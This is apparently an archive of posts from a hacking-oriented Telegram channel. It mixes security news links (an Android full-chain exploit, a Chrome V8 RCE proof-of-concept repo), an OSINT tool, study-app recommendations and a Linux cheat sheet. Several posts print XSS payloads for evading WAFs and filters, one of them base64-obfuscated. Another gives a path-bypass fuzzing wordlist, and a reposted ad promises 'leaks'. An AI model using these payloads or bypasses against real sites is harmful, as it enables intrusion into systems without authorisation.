Hacking Vidhya
Kanalga Telegram’da o‘tish
We Talk about : Hacking , CTFs , Pentesting , Red & Blue Team etc. Not Allowed: Selling, Carding, Cracking Crypto.
Ko'proq ko'rsatish383
Obunachilar
Ma'lumot yo'q24 soatlar
+37 kun
+2230 kun
Postlar arxiv
A full-chain exploit dubbed “IonStack” demonstrates how a single malicious URL click can hand attackers complete control over an Android device
Credit/Source: https://cybersecuritynews.com/android-17-root-1-click
Add these to your endpoint fuzzing wordlist to bypass path restrictions and catch exposed endpoints:
/rest/v1/;/
/rest/v2/;/
/rest/v1/v2/;/
/monitoring/
Bypass 405 Alibaba WAF
We can use the onloadstart/end event and encode characters ().
<audio src=1 onloadstart=alert(1)//>
<img src=1 onloadend=alert(2)//>Repost from N/a
🚀 Welcome to CyberRat Community 🐀
Out of the rat race.
Rebuilding in Cyber. ⚡️
🔣 Target: 500 Members
Join now to unlock exclusive cybersecurity resources, leaks, and more.
📎 https://t.me/+TuqD7ywavI83MjVl
⚡️Join early. Stay ahead.⚡️
🔥 Chrome RCE PoC: CVE-2026-6307
A working renderer RCE Proof of Concept for CVE-2026-6307 — a V8 type-confusion bug (JS-to-Wasm deoptimization) patched in Chrome 147.0.7727.101.
✅ Full primitives (addrof/fakeobj, out-of-cage, in-cage r/w)
✅ No-ASLR RCE that patches JIT code to pop xcalc
✅ Based on Nebula Security writeup
✅ Heavily improved with frontier LLMs + human direction (4-day experiment)
This is renderer-only and still far from fully weaponized, but great for learning and research.
📥 PoC + scripts:
https://github.com/0xsha/CVE-2026-6307
#Chrome #V8 #Exploit #CVE #SecurityResearch
XSS Filter Evasion: How Attackers Bypass XSS Filters – And Why Filtering Alone Isn’t Enough
<svg/onload=alert`XSS`>
<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">
<a href="jav
ascript:
ale
rt('Successful XSS')">Visit google.com</a>
https://www.acunetix.com/blog/articles/xss-filter-evasion-bypass-techniques/🧑🎓 10 GITHUB REPOS EVERY COLLEGE/UNIVERSITY STUDENTS MUST KNOW.
🆓 All free. all open-source. save this in your bookmark.
1️⃣Open notebook
⭐️33.9k the open-source NotebookLM alternative. feed it your lecture notes, PDFs, papers, chat with them, get audio overviews. yours, no Google lock-in.
🔗https://github.com/lfnovo/open-notebook
2️⃣Calibre
⭐️25.2k manage & convert your entire ebook + textbook library. read anything on any device.
🔗https://github.com/kovidgoyal/calibre
3️⃣Buzz
⭐️19.9k transcribe recorded lectures to text, offline & free. never miss a word again.
🔗https://github.com/chidiwilliams/buzz
4️⃣Anki
⭐️28.8k spaced-repetition flashcards. med, law, languages, any exam. memorize anything, forget nothing.
🔗https://github.com/ankitects/anki
5️⃣Stirling-PDF
⭐️85k the ultimate PDF toolkit. merge, split, sign, compress, convert, locally, no sketchy upload sites.
🔗https://github.com/Stirling-Tools/Stirling-PDF
6️⃣Appflowy
⭐️73k open-source Notion. notes, docs, tasks & deadlines - your whole semester in one place.
🔗https://github.com/AppFlowy-IO/AppFlowy
7️⃣Zotero
⭐️14.6k collect, organize & auto-cite every source. turns essay & thesis citations into one click.
🔗 https://github.com/zotero/zotero
8️⃣Excalidraw
⭐️126k hand-drawn whiteboard. mind maps, study diagrams, group brainstorms. instantly shareable.
🔗https://github.com/excalidraw/excalidraw
9️⃣Paperless-ngx
⭐️42.6k turn every PDF & document into a searchable archive. find anything instantly.
🔗https://github.com/paperless-ngx/paperless-ngx
1️⃣0️⃣ ONLYOFFICE Docs
⭐️6.6k open-source Google Docs. write & collaborate on docs, sheets & slides.
🔗 https://github.com/ONLYOFFICE/DocumentServer
Android 17 root: full chain browser-to-kernel exploit with two 0-day vulnerabilities affecting Firefox before v151.0.2 (CVE-2026-10702)
Click on the link -> root Android
https://x.com/nebusecurity/status/2069707520160227688
The Biometric AuthToken Heist: Cracking PINs and Bypassing CE via a Long-Ignored Attack Surface
https://www.darknavy.org/blog/the_biometric_authtoken_heist/
PRISM
Self-hosted OSINT platform with 22+ modules, OPSEC scoring, AI summary, and a real-time web dashboard.
Scan any domain, IP, email, phone, or username get WHOIS, DNS, threat intel, breach data, username search, dark-web mirrors, OPSEC score, entity graphs, and HTML/PDF reports in seconds.
Source/Repo: https://github.com/NovaCode37/Prism-platform
Demo: https://getprism.su
🖼️ Daily Cybersecurity Meme
"LEGACY MONOLITH"
"DEVELOPERS"
"NEW MICROSERVICE WITH 0 TESTS"
🐧 Essential Linux Commands Cheat Sheet (+100)
Level up your Linux game with a curated, field-tested list of commands every power user, sysadmin, and security pro should know. This cheat sheet organizes the essentials by category so you can move faster and break less. 🛠
📌 What’s inside
🔹 File & Directory: ls, cd, pwd, cp, mv, rm, mkdir, touch, find
🔹 Processes: ps, top/htop, kill/pkill, bg/fg, renice
🔹 Permissions & Ownership: chmod, chown, chgrp
🔹 Networking: ping, whois, dig, ss/netstat, ip/ifconfig, ssh/scp, wget, curl, traceroute/mtr, nmap
🔹 Text Processing: grep, sed, awk, cut, wc, diff, head, tail, less
🔹 Disk & System: df, du, free, uname, uptime, whereis/which, date, cal, lsof, dd
🔹 Archives: tar, gzip, zip, unzip
🔹 Packages: apt, dnf, pacman, pip
🔹 Env & Scripting: env, export, PATH, alias, cron jobs, bash loops/functions
🔹 Git Essentials: init, clone, add, commit, status, pull, push, branch, checkout, merge, stash, log, reset, revert, cherry-pick
